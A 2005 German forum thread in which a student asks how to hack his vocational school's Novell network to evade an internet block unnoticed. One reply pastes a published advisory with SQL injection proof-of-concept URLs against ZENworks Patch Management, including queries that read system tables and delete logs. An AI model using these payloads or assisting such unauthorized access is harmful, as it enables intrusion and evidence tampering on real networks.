Wie kann ich in novel knacken??????

marsi87 · 2. November 2005

Hab ein problem in meiner Berufsschule ist im in der Textverarbeitung so was von langweilig aber das Internet ist gesperrt wie kann ich aber trotzdem mich ins Internet hacken ohne das mein lehrer es merkt??

Anzeige

moep_rush · 2. November 2005

1.) heist es novell
2.) w00t
3.)

Code:

Summary
ZENworks Suite "automates and enforces business and IT managment processes across the lifecycle of desktops, laptops, servers and handhelds to control costs, ensure security and compliance, optimize the value of IT assets across diverse server and client platforms".

The Novell ZENworks Patch Management Server is vulnerable to SQL injection in the management console.

Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.cirt.dk/advisories/cirt-39-advisory.pdf

Details
Vulnerable Systems:
* Novell ZENworks Patch Management Server version 6.0.0.52

Immune Systems:
* Novell ZENworks Patch Management Server 6.2.2.181 or newer

Proof of Concept:
http://192.168.1.10/computers/default.asp?...irection=';

Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=';StatusFilter=ERRR &computerFilter=187&impactFilter=29&saveFilter=save&Page=rep

Response from server: Incorrecy syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=';&computerFilter=187&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=ERRR&computerFilter=';&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

Exploitation examples:
http://192.168.1.10/computers/default.asp?...rection=;select *+from+testclient.master.dbo.sysobjects

http://192.168.1.10/computers/default.asp?...rection=;select *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS. [2]

http://192.168.1.10/computers/default.asp?...rection=;SELECT name+FROM+sysobjects+WHERE+xtype+=+"U"

http://192.168.1.10/computers/default.asp?...rection=;select *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS.

Solution:
Upgrade to ZENworks Patch Management version 6.2.2.181 (or newer hot fix via your PLUS server) found at http://download.novell.com.

marsi87 · 3. November 2005

aha und geht das auf deutsch auch

coffe · 3. November 2005

SQL injection <- -> google !
sicher das es novell is oder suse ?? ist ja jetzt ineinander verschachtelt, was wie und wo sag ich nich *gg* weil ichs nicht mit sicherheit weiss

moep_rush · 3. November 2005

kurz gesagt gibt es kein 1 klick lamer tool womit du ein (!) novell ownen kannst..entweder du kennst dichn bissle damit aus oder du lässt des !

mfg moep

Wie kann ich in novel knacken??????

Videos zum Thema

Ähnliche Themen mit den Stichworten: kann novel knacken

Nützliche Suchen

Wie kann ich in novel knacken??????

Videos zum Thema

Ähnliche Themen mit den Stichworten: kann novel knacken